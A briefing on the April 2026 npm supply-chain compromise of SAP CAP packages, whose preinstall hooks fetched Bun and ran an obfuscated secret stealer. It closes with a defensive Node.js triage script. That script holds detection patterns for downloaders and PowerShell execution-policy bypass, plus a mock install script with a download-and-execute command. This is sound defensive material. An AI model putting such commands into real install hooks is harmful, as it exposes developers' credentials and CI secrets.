Feross warns of SAP CAP npm compromise

- Feross Aboukhadijeh flagged a live npm supply-chain attack hitting SAP's CAP ecosystem after malicious versions of `mbt` and three `@cap-js` packages landed on April 29.
- The poisoned releases were `mbt@1.2.48`, `@cap-js/db-service@2.10.1`, `@cap-js/sqlite@2.2.2`, and `@cap-js/postgres@2.2.2`, each carrying a `preinstall` stealer that pulled down Bun and ran obfuscated malware. (snyk.io)
- These packages sit in SAP build and database workflows, so developer machines and CI/CD secrets were suddenly in scope. (socket.dev)

This is a software supply-chain attack, the nasty kind where nothing looks wrong until your own build tools do the attacker's work for them. The immediate problem is not a bug in an SAP app. It is that official npm packages used in SAP's CAP toolchain were published with malicious install-time code on April 29, 2026. Feross Aboukhadijeh pushed the warning into the o[…]ions, secrets may already have walked out the door. (snyk.io)

Four packages in SAP's development stack were confirmed compromised: `mbt@1.2.48`, `@cap-js/db-service@2.10.1`, `@cap-js/sqlite@2.2.2`, and `@cap-js/postgres@2.2.2`. Those are not random side packages. `mbt` is SAP's Cloud MTA Build Tool, and the `@cap-js/*` packages are the database services inside CAP apps. (snyk.io)

### Why do those packages matter so much?

Because they sit in exactly the places you do not want surprise code execution: local developer setup, dep[…]. SAP's documentation describes MBT as the default and recommended build tool in SAP Business Application Studio, and it is also installable through npm. That means a poisoned release can land both on laptops and in automated pipelines. (help.sap.com)

### What did the malicious code do?

The compromised versions added a `preinstall` hook. Install hooks run automatically as part of `npm install`, with the installing user's privileges, which is why the hook rather than the package's runtime code is the attack surface here. That hook downloaded the Bun JavaScript runtime from GitHub Releases, unpacked it, and used it to run an obfuscated payload of roughly 11.6 MB. Socket says the script also followed redirects without validating the destination and used PowerShell with an execution-policy bypass on Windows, which is the opposite of what you want from a trusted package installer. (snyk.io)

The stealer went after credentials and cloud secrets, then used compromised GitHub accounts to create public "dead-drop" repositories tagged with the phrase "A Mini Shai-Hulud has Appeared." That odd string matters because it gave defenders a searchable marker that infected machines were already exfiltrating in the wild. (snyk.io)

### How broad could the blast radius be?

Potentially pretty wide. Snyk's writeup cites download figures […]: 250,000 for `@cap-js/sqlite`, 52,000 for `mbt`, and 10,000 for `@cap-js/postgres`. Download counts are not victim counts, obviously, but they tell you these are central packages, not obscure experiments. (snyk.io)

### Did maintainers respond?

Yes, and fast. The disclosure issue in the CAP database-services repo shows a maintainer acknowledging the report, and replacement releases for the CAP packages were published later the same day, after the malicious versions appeared in a tight window on April 29. (github.com) Fast removal narrows the window, but it does not undo anything for whoever installed inside it: a fixed version on the registry does not recall code that already ran.

### What should teams do right now?

Assume install-time exposure until proven otherwise. Check lockfiles and artifact caches for the exact bad versions (the lockfile, not `package.json`, records which version was actually resolved), review any secrets that may have been present on affected developer boxes or runners and rotate them, and block those versions explicitly so rebuilds do not pull them back in. Those steps are an inference from the attack path, but they line up with the guidance security researchers are giving, because the compromise targeted install and build environments directly. (socket.dev)

### Bottom line

The scary part is not just "npm package went bad." It is where these packages live: inside SAP development and deployment plumbing. When the build tool is the thing that gets poisoned, the attack surface jumps from one app to every secret the pipeline can reach. (socket.dev)
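The two checks the briefing recommends, the lockfile sweep for the exact poisoned versions and a look at install hooks for the download-and-execute behaviour described above, as an added Node.js example. This is not code from the article, SAP, Snyk or Socket. The sample lockfile, the `example-dep` manifest, its `setup.js` contents and the URL in it are constructed for illustration, and the indicator patterns are an assumption modelled on the behaviour the briefing describes, not signatures published by any vendor.

```javascript
// Added example (not from the article or from SAP, Snyk or Socket): triage
// helpers for the two checks the briefing recommends, for Node.js >= 14.
// All sample data below is constructed for illustration.

// Exact poisoned name@version pairs named in the briefing.
const POISONED = {
  "mbt": ["1.2.48"],
  "@cap-js/db-service": ["2.10.1"],
  "@cap-js/sqlite": ["2.2.2"],
  "@cap-js/postgres": ["2.2.2"],
};

// Indicators of the install-time behaviour described (fetch a runtime from
// GitHub Releases, invoke Bun, bypass PowerShell execution policy). These
// patterns are assumptions for illustration, not vendor-published signatures.
const SCRIPT_INDICATORS = [
  { name: "github-releases-download", re: /github\.com\/[^\s"']+\/releases\/download/i },
  { name: "bun-runtime", re: /\bbun(\.exe)?\b/i },
  { name: "powershell-bypass", re: /powershell.*-(ExecutionPolicy|Exec|ep)\s+Bypass/i },
  { name: "downloader", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
];
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Return every poisoned name@version in a package-lock.json, with the path
// where it was resolved. Handles lockfileVersion 2/3 ("packages" map) and
// falls back to the v1 "dependencies" tree.
function findPoisonedInLock(lock) {
  const hits = [];
  const check = (name, version, where) => {
    const bad = POISONED[name];
    if (bad && bad.includes(version)) hits.push({ name, version, where });
  };
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === "") continue; // the root project itself
      const idx = path.lastIndexOf("node_modules/");
      const name = meta.name || (idx >= 0 ? path.slice(idx + "node_modules/".length) : path);
      check(name, meta.version, path);
    }
    return hits;
  }
  const walkV1 = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const where = `${prefix}node_modules/${name}`;
      check(name, meta.version, where);
      walkV1(meta.dependencies, where + "/");
    }
  };
  walkV1(lock.dependencies, "");
  return hits;
}

// Report each install hook in a dependency's package.json and which indicators
// it matches. When the hook only runs a bundled script ("node setup.js"), the
// file's contents (passed in `files`) are scanned too, since that is where the
// actual download-and-execute logic usually lives.
function auditInstallScripts(manifest, files = {}) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    let text = cmd;
    const m = /\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/.exec(cmd);
    if (m && files[m[1]] !== undefined) text += "\n" + files[m[1]];
    const matched = SCRIPT_INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
    findings.push({ package: manifest.name, hook, matched });
  }
  return findings;
}

// Constructed lockfileVersion 3 sample: two poisoned entries, one clean one.
const SAMPLE_LOCK = JSON.parse(`{
  "name": "sample-cap-app", "lockfileVersion": 3,
  "packages": {
    "": { "name": "sample-cap-app", "version": "1.0.0" },
    "node_modules/@cap-js/sqlite": { "version": "2.2.2" },
    "node_modules/@cap-js/db-service": { "version": "2.10.0" },
    "node_modules/mbt": { "version": "1.2.48" }
  }
}`);

// Constructed manifest and helper script modelled on the described hook.
// Package name, URL and file name are invented for illustration.
const SAMPLE_MANIFEST = {
  name: "example-dep", version: "0.0.1",
  scripts: { preinstall: "node setup.js", test: "mocha" },
};
const SAMPLE_FILES = {
  "setup.js": [
    'const url = "https://github.com/example-org/example/releases/download/v1/bun.zip";',
    'if (process.platform === "win32") run("powershell -ExecutionPolicy Bypass -File run.ps1");',
    'else run("curl -L " + url + " -o bun.zip && ./bun payload.js");',
  ].join("\n"),
};

// Combined report: poisoned versions resolved in the lock, plus install hooks
// that matched at least one indicator.
function triage(lock, manifest, files) {
  return {
    poisoned: findPoisonedInLock(lock),
    suspiciousHooks: auditInstallScripts(manifest, files).filter((f) => f.matched.length > 0),
  };
}

console.log(JSON.stringify(triage(SAMPLE_LOCK, SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

Run the lock sweep over every `package-lock.json`, `npm-shrinkwrap.json` and CI artifact cache rather than `package.json` alone, since only the lock records the version that was actually resolved. A hook with no indicator match is still reported, because an install hook in a database driver deserves a look regardless of what it runs. For blocking, note that npm's `overrides` field in the root `package.json` pins a transitive dependency to a chosen version but cannot express "anything except X", so pin to the replacement releases; `npm ci --ignore-scripts` on runners stops all install hooks, at the cost of breaking packages that legitimately need them.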

Shared from Scout.